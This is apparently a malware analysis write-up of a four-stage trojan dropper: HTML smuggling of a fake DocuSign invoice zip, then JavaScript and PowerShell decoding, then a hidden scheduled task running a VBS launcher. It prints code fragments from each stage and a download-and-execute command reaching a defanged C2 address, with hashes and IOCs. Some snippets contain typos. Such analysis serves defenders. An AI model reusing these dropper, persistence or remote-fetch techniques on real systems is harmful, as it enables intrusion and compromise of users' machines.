Generic Trojan Dropper
STAGE 1:
`064ee9cc4256a4e004d3c6e74e1a4cc2d686f82a7e22640aa718167b5af40a29 ./sample.html `
this is a HTML file containing the javascript code that drops a zip file,
we can see in the body section it’s the payload that is encrypted, the id is jzasjnpc & class is bwkytcnl.
this is the excrypted zip file, first it’s getting converted from base64 & then xor & then base64 decoded again.
the xor key for this zip payload is so83fnguk42vuluw82syq55zhqqf3qm9sznw3skkxdfbcj2fjy1zbi6t4wn89m8kafg1kvi04dppc1q5xye8zzxo4k6utjrwwsc2f59khfmzkvycg8qxwl36asncitbj,
<body>
<main class="bwkytcnl" id="jzasjnpc" data="JipLdyQsNjEqdXM/NCo/QEleEiA9UUYjQzcGJ3IhB3AyOy8ScjIqKiwzIFcuPnMSJxNwAy8QBz5WGTROWDp2By0zNUcyRT9kVTMUBS9cAU8uM....
name of the zip file is May10-2023-Invoice-DocuSign.zip
this is the procedure that generates the zip file, and in the end that object is executed
function extract_zip(input_url_var, 512)
{
var array_new = [];
var fromb64input_data = atob_fromB64(input_url_var);
for(var i = 0; i < fromb64input_data.length; i += 512)
{
var sliced = fromb64input_data.slice(i, i + 512);
var sliced_array = new this[array](sliced.length);
for(var i = 0; i < sliced.length; i++)
{
sliced_array[i] = sliced.charCodeAt(i);
}
var out_zip = new this[Uint8Array](sliced_array);
array_new.push(out_zip);
}
var zip_data = new this[blob](array_new, {type: octet/stream});
return zip_data;
}
function zip_create(zip_data)
{
let zip_name = "May10-2023-Invoice-DocuSign" + ".zip";
let file_obj = new this[file]([zip_data], zip_name, {type: application/zip});
let file_obj_url = this[URL][createObjectURL](file_obj);
var createElement_a = document.createElement("a");
document.body.appendChild(createElement_a);
createElement_a.setAttribute(href,file_obj_url);
createElement_a[download] = zip_name;
createElement_a.click();
this[URL][revokeObjectURL](file_obj_url);
}
STAGE 2:
`a36c8ea0188ddc3ed8f06c8e352bb314bc222fef6f9baeb211cd97ac62462dec May10-2023-Invoice-DocuSign.zip`
this zip file contains a javascript file.
44737c01c93b96afcbb96c0b38993594d29a0a07d625999ef503c8424da90b0e ./May10-2023-Invoice-DocuSign.js
this javascript file contains 4 strings, after concatinating them and after removing “s” & “V” chars & then converting from hex, gets us another javascript. this is the procedure of that
temp = STR_4.replace(/[sV]/g,'');
var ooqajrjz = "";
for (var i=0;i<temp.length;i+=2)
{
ttjqepbj = temp.substr(i,2);
ooqajrjz += str_from_char_code(kmbvxuoa(ttjqepbj, 16));
}
STAGE 3:
this javascript produces a powershell script that is run after 10 seconds of sleep, poweshell script is split by “!” and converted from base64.
var payload = ' < payload string > '
var split_payload = xhhwtarcadepz(payload).split('!');
Win = new this[split_payload[4]](split_payload[1]);
Win.PopUp('This document is corrupt.', 10, 'ERROR', 48);
var yjdednyw = new Date();
while (true) {
WScript.Sleep(10);
var qhchhvwd = new Date();
if (qhchhvwd - yjdednyw > 774720) {
Win[split_payload[3]](split_payload[2], keCarthagedf);
break;
}
};
STAGE 4:
this poweshell script decodes some byte arrays using xor that is information about the scheduled task.
this script will write a file to C:\Users\<user>\AppData\Local\Microsoft\WindowsPowershell\<executingScript.vbs>
$rERbWtRv = [Convert]::FromBase64String(${isWABlOEp})
$bytes = Get-Variable -ValueOnly -Name '5EVLS'
$bytes.writeallbytes.Invoke(${NynG}, ${ReRBwTRV})
$askzpHUpAj = (pwd).ToString() + '\'
$vQpSBXgyj = &(cd $JtATCAR)
$tkqrmLSfPD = '"' + (loopFunc([System.Byte[]]@(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$iZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
$eRQcf = Start-Sleep -Seconds $TkQRmlsFpD
$tpNDJPwAa = New-ScheduledTaskPrincipal $UJrw
$aIufdyWasr = Register-ScheduledTask -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Days 365)
$dwtTAWqx = New-ScheduledTaskSettingsSet -Hidden -MultipleInstances Parallel -AllowStartIfOnBatteries
Register-ScheduledTask -TaskName ${WbWmgQb} -Action ${eRQcf} -Trigger ${aIufdyWasr} -Settings ${dwtTAWqx}
The persistent VBS is merely a WScript command to run PowerShell, and it uses parameters for the C2 from the scheduled task command.
c = WScript.Arguements(0)
set s = CreeateObject("WScript.shell")
s.Run "Powershell.exe -exec bypass" & c, 0
this scheduled task is running approx every minute, & it runs thar vbs script with the C2 information as arguements.
C:\Users\<user>\AppData\Local\Microsoft\WindowsPowershell\<executingScript.vbs> "iex(iwr -useb http://159.65.42[.]223/r/idm/148F4423C27E506D)"
IOCs
- 159.65.42[.]223:80